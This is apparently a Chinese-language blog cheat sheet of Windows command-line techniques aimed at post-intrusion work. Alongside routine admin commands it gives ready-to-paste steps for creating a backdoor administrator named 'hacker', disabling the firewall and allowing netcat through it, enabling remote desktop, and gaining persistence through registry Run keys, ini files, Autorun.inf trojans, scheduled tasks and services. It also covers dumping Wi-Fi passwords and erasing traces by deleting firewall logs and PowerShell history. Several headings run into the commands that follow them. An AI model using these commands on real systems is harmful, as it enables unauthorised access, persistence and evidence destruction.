Windows 多条命令执行使用&:whoami & net user
查找文件:dir /s /b c:\Content\JqueryPlug\viewer
命令行编码设置
chcp 65001 # utf8编码
chcp 936 # gbk编码默认环境变量
环境变量 与对应的路径
%ALLUSERSPROFILE% C:\ProgramData
%APPDATA% C:\Users\用户名\AppData\Roaming
%COMMONPROGRAMFILES% C:\Program Files\Common Files
%COMMONPROGRAMFILES(x86)% C:\Program Files (x86)\Common Files
%COMSPEC% C:\Windows\System32\cmd.exe
%HOMEDRIVE%或%SystemDrive% C:\
%HOMEPATH% C:\Users\用户名
%LOCALAPPDATA% C:\Users\用户名\AppData\Local
%PROGRAMDATA% C:\ProgramData
%PROGRAMFILES% C:\Program Files
%PROGRAMFILES(X86)% C:\Program Files (x86)
%PUBLIC% C:\UsersPublic
%SystemRoot% C:\Windows
%TEMP%或%TMP% C:\Users\用户名\AppData\LocalTemp
%USERPROFILE% C:\Users用户名
%WINDIR% C:\Window关闭防火墙
netsh firewall set opmode mode=disable开启防火墙
netsh firewall set opmode mode=enable查看防火墙配置规则
netsh advfirewall firewall show rule name=all添加例外端口
netsh advfirewall firewall add rule name="HTTP" protocol=TCP dir=in localport=8080 action=allow删除例外端口
netsh advfirewall firewall delete rule name="HTTP" protocol=TCP dir=in localport=8080添加例外程序
netsh advfirewall firewall add rule name="f.exe" dir=in program="e:\f.exe" action=allow删除防火墙日志
del C:\Windows\System32\LogFiles\Firewall\pfirewall.log禁用网卡
netsh interface set interface "本地连接"disabled启用网卡
netsh interface set interface "本地连接" enabled开启445端口对应的服务
net start lanmanserver开启135对应的服务
net start rpcss防火墙放行80端口
netsh advfirewall firewall add rule name="www" dir=in protocol=tcp localport=80 action=allow打开远程桌面服务
net start "Remote Desktop Configuration"
net start "Remote Desktop Services"
net start "Remote Desktop Services UserMode Port Redirector"1、REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
2、wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1创建用户并添加到管理员组
net user hacker 123456 /add
net localgroup Administrators hacker /add开机启动项设置
启动项目录
需要登录才能触发
C:/Documents and Settings/Owner/「开始」菜单/程序/启动
C:/Documents and Settings/User/「开始」菜单/程序/启动
# 当前用户有效
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup
# 所有用户有效
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
%programdata%\Microsoft\Windows\Start Menu\Programs\Startup注册表设置
需要用户登录后才执行程序
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/windows NT/CurrentVersion/Winlogon/
HKEY_LOCAL_MACHINE/System/CurrentControlSet/Services/
HKEY_LOCAL_MACHINE/System/ControlSet001/Session Manager/BootExecute
HKEY_LOCAL_MACHINE/SYSTEM/ControlSet001/Control/Session Manager/BootExecute
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Group Policy Objects/本地User/Software/Microsoft/windows /CurrentVersion/Policies/ Explorer/Run
HKLM/Software/Microsoft/windows /CurrentVersion/Explorer/Browser Helper Objects/
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/windows /AppInit_DLLs
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/windows NT/CurrentVersion/Winlogon/Notify
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/windows /CurrentVersion/RunOnceEx
HKEY_LOCAL_MACHINE/Software/Microsoft/windows /CurrentVersion/RunServicesOnce/
HKEY_LOCAL_MACHINE/Software/Microsoft/windows /CurrentVersion/RunServices/
HKEY_CURRENT_USER/Software/Microsoft/windows /CurrentVersion/RunOnce/Setup/
HKEY_USERS/.Default/Software/Microsoft/windows /CurrentVersion/Run/
HKEY_USERS/.Default/Software/Microsoft/windows /CurrentVersion/RunOnce/
HKEY_LOCAL_MACHINE/Software/Microsoft/Active Setup/Installed Components/
HKEY_LOCAL_MACHINE/System/CurrentControlSet/Services/VxD/
HKEY_CURRENT_USER/Control Panel/Desktop
HKEY_LOCAL_MACHINE/System/CurrentControlSet/Control/Session Manager
HKEY_LOCAL_MACHINE/System/CurrentControlSet/Services/
HKEY_LOCAL_MACHINE/Software/Microsoft/windows NT/CurrentVersion/Winlogon/Userinit
HKEY_CURRENT_USER/Software/Microsoft/Windows NT/CurrentVersion/windows /run
HKEY_LOCAL_MACHINE/Software/Microsoft/windows /CurrentVersion/ShellServiceObjectDelayLoad/
HKEY_CURRENT_USER/Software/Microsoft/Windows NT/CurrentVersion/windows /load
HKEY_CURRENT_USER/Software/Microsoft/windows /CurrentVersion/Policies/Explorer/run/
HKEY_LOCAL_MACHINE/Software/Microsoft/windows /CurrentVersion/Policies/Explorer/run/
HKLM/SOFTWARE/Classes/Protocols/Filter
HKLM/SOFTWARE/Classes/Protocols/Handler
HKLM/SOFTWARE/Microsoft/Active Setup/Installed Components
HKLM/SOFTWARE/Microsoft/windows /CurrentVersion/Explorer/SharedTaskScheduler
HKLM/SOFTWARE/Microsoft/windows /CurrentVersion/ShellServiceObjectDelayLoad
HKLM/Software/Microsoft/windows /CurrentVersion/Explorer/ShellExecuteHooks
HKLM/Software/Microsoft/windows /CurrentVersion/Shell Extensions/Approved
HKLM/Software/Classes/Folder/Shellex/ColumnHandlers
HKCU/Software/Microsoft/Internet Explorer/UrlSearchHooks
HKLM/Software/Microsoft/Internet Explorer/Toolbar
HKLM/Software/Microsoft/Internet Explorer/Extensions
HKLM/System/CurrentControlSet/Control/Session Manager/BootExecute
HKLM/Software/Microsoft/windows NT/CurrentVersion/Image File Execution Options
HKLM/System/CurrentControlSet/Control/Session Manager/KnownDlls
HKLM/SOFTWARE/Microsoft/windows NT/CurrentVersion/Winlogon/UIHost
HKLM/SOFTWARE/Microsoft/windows NT/CurrentVersion/Winlogon/Notify
HKCU/Control Panel/Desktop/Scrnsave.exe
HKLM/System/CurrentControlSet/Services/WinSock/Parameters/Protocol_Catalog9
HKLM/SYSTEM/CurrentControlSet/Control/Print/Monitors
HKLM/SYSTEM/CurrentControlSet/Control/Lsa/Authentication Packages
HKLM/SYSTEM/CurrentControlSet/Control/Lsa/Notification Packages
HKLM/SYSTEM/CurrentControlSet/Control/Lsa/Security Packages系统配置文件
C:\windows\win.ini
[windows ]
load=xxx.exe[这 种方法文件 会在后台运行]
run=xxx.exe[这 种方法文件 会在默认状态下被运行]C:\windows\system.ini
默认为:
[boot]
Shell=Explorer.exe [Explorer.exe是Windows程序管理器或者windows 资源管理器,属于正常]
可 启动文件 后为:
[boot]
Shell= Explorer.exe xxx.exe [现在许多病毒会采用此启动方式,随着Explorer启动, 隐蔽性很好]
注意: SYSTEM.INI和WIN.INI文件不同,SYSTEM.INI的启动只能启动一个指定文件 ,不要把 Shell=Explorer.exe xxx.exe换为Shell=xxx.exe,这样会使windows 瘫痪!wininit.ini
WinInit即为Windows Setup Initialization Utility, 中文:windows 安装初始化工具 .
它会在系 统装载windows 之前让系统执行一些命令,包括复 制,删除,重命名等,以完成更新文件 的目的.
文件 格 式:
[rename]
xxx1=xxx2
意思是把xxx2文件复制为文件名为xxx1的文件,相当于覆盖xxx1文件
如 果要把某文件 删除,则可以用以下命令:
[rename]
nul=xxx2
以 上文件 名都必须包含完整路径.winstart.bat
这是系统启动的批处理 文件,主要用来复制和删除文件 . 如一些软件卸载后会剩余一些残留物在系统,这时它的作用就来了.
如:
“@if exist C:/WINDOWS/TEMPxxxx.BAT call C:/windows /TEMPxxxx.BAT”
这 里是执行xxxx.BAT文件 的意思userinit.ini
这种启动方式也会被一些病毒作为启动方式,与SYSTEM.INI相同.autoexec.bat
这个是常用的启动方式,病毒会通过它来做一些动作,在AUTOEXEC.BAT文件中会包含有恶意代码。如format c: /y 等等。
组策略
计划任务
利用屏幕保护程序
Windows 屏幕保护程序是一个*.scr文件,是一个可执行PE文件,如果把屏幕保护程序*.scr重命名为*.exe的文件,这个程序仍然可以正常启动,类似的*.exe文件更名为*.scr文件也仍然可以正常启动。
文件路径保存在System.ini中的SCRNSAVE.EXE=xxx的这条中。如: SCANSAVE.EXE=/%system32% xxxx.scr
更改扩展名启动方式
驱动程序
AutoRun.inf
Autorun.inf这个文件出现于光盘加载的时候,放入光盘时,光驱会根据这个文件内容来确定是否打开光盘里面的内容.
Autorun.inf的内容通常是:
[AUTORUN]
OPEN=文件名.exe
ICON=icon(图标文件).ico
1.如一个木马,为xxx.exe.那么Autorun.inf则可以如下:
ōPEN=Windows\xxx.exe
ICON=xxx.exe
这时,每次双击C盘的时候就可以运行木马xxx.exe.
2.如把Autorun.inf放入C盘根目录里,则里面内容为:
ōPEN=D:\xxx.exe
ICON=xxx.exe
这时,双击C盘则可以运行D盘的xxx.exeVBS静默运行程序
set ws=WScript.CreateObject("WScript.Shell")
ws.Run "d:\yy.bat",0
另存为vbs文件即可,其中d:\yy.bat是你需要运行的bat文件的路径。端口映射
#把192.168.204.132的8000端口映射到本机的80端口,访问本机80端口的数据都会被转发到192.168.204.132:8080
netsh interface portproxy add v4tov4 listenaddress=127.0.0.1 listenport=80 connectaddress=192.168.204.132 connectport=8000查看ipv4到ipv4的端口映射
netsh interface portproxy show v4tov4删除添加的端口映射
netsh interface portproxy delete v4tov4 listenaddress=127.0.0.1 listenport=80以管理员权限启动bat脚本(UAC模式)
https://www.jb51.net/article/67623.htm
%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",1)(window.close)&&exit查看计划任务
图形化:taskschd.msc
命令行:schtasks
添加计划任务
https://www.cnblogs.com/mq0036/p/6761684.html
https://www.cnblogs.com/lostyue/archive/2011/10/24/2223166.html
schtasks /create /sc minute /tn "hacker" /ru system /tr calc.exe
# 或schtasks /create /sc minute /tn "hacker" /ru %username% /tr calc.exe删除计划任务
schtasks /delete /tn "hacker"添加服务
# 添加服务名为hacker的服务
sc create hacker binPath= D:\test\test.exe start= auto删除服务
sc delete hacker文件后缀关联
# 关联文件后缀
assoc .abc=batfile
# 删除关联
assoc .abc=
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts多次覆写清除入侵痕迹
cipher/w:D:tools删除powershell历史记录
del C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt查看WiFi密码
for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear压缩
compact
makecab c:\jboss\bin\1.dmp 1.zip
解压缩
expand提升cmd权限
runas /user:Win-200\administrator cmd关闭防火墙
- Windows 2003及之前:
netsh firewall set opmode disable - Windows 2003之后:
netsh advfirewall set allprofiles state off
修改防火墙规则
Windows 2003及之前版本
- 允许程序全部连接:
netsh firewall add allowedprogram c:\nc.exe "allow nc" enable
Windows 2003之后版本
- 允许程序进入:
netsh advfirewall firewall add rule name="pass nc" dir=in action=allow program="c:\nc.exe" - 允许程序出:
netsh advfirewall firewall add rule name="Allow nc" dir=out action=allow program="c:\nc.exe" - 允许3389端口放行:
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
修改防火墙日志存储位置
netsh advfirewall firewall set currentprofile logging filename "c:\windows\temp\fw.log"
开启远程桌面
- Windows 2003:
wmic path win32_terminalservicesetting where (__CLASS ≠"") call setallowtsconnections 1 - Windows 2008:
wmic /namespace:\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS !="") call setallowtsconnections 1 - Windows 2012:
wmic /namespace:\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName='RDP-Tcp') call setuserauthenticationrequired 1 reg add "HKLM\SYSTEM\CURRENT\CONTROLSET\CONTROL\TERMINAL SERVER" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
Comments | NOTHING